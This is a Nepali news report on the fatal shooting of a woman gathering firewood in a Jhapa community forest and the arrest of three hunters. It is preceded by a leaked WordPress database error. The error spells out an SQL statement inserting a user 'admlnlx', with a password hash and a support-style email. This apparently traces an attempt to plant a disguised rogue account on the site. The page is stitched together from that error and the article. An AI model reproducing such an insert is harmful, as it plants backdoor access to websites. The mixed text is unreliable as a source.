WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B8qv6VlA/s.x3De4DC3nmjHHMphJmE0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-17 13:41:19', '', 'admlnlx', 'admlnlx')
भद्रपुर,पुस ५ –
झापाको जलथल–२ स्थित रणकालीन सामुदायिक वनमा दाउरा लिन गएकी सोही गाविस–३ निवासी ३२ वर्षीया अनिता मेचेको हत्या आरोपमा पक्राउ परेका तीनजनालाई प्रहरीले आज सार्वजनिक गरेको छ ।
मङ्सिर २७ गते दिनको ४ बजे जङ्गलमा सिकार गर्न गएका सिकारीले चलाएको भरुवा बन्दुकको छर्रा लागेर मेचे घाइते भएको र उपचारार्थ ओमसाई हस्पिटल भद्रपुर ल्याउँदै गर्दा उहाँको बाटैमा मृत्यु भएको थियो ।
प्रहरीले अनुसन्धानका क्रममा जङ्गलमा सिकार गर्न गएका भद्रपुर नगरपालिका–२ निवासी १८ वर्षीय तिखु भन्ने विशाल योङहाङ्ग, सोही स्थान बन्ने ३२ वर्षीय सुमन भन्ने सुकनन्द लिम्बू र २० वर्षीय कालु भन्ने किरण लिम्बूलाई प्रहरीले पक्राउ गरेको थियो । गोली चलाउने विशाल योङहाङ्ग रहेको र अन्य दुईजनाले सहयोगीका रुपमा काम गरेको प्रहरीको अनुसन्धानबाट खुलेको छ ।
उनीहरुविरुद्ध चोरी–सिकारी र कर्तव्य ज्यान मुद्दा चलाउने तयारी भइरहेको प्रहरी उपरीक्षक शैलेश थापा क्षेत्रीले जानकारी दिनुभयो । – रासस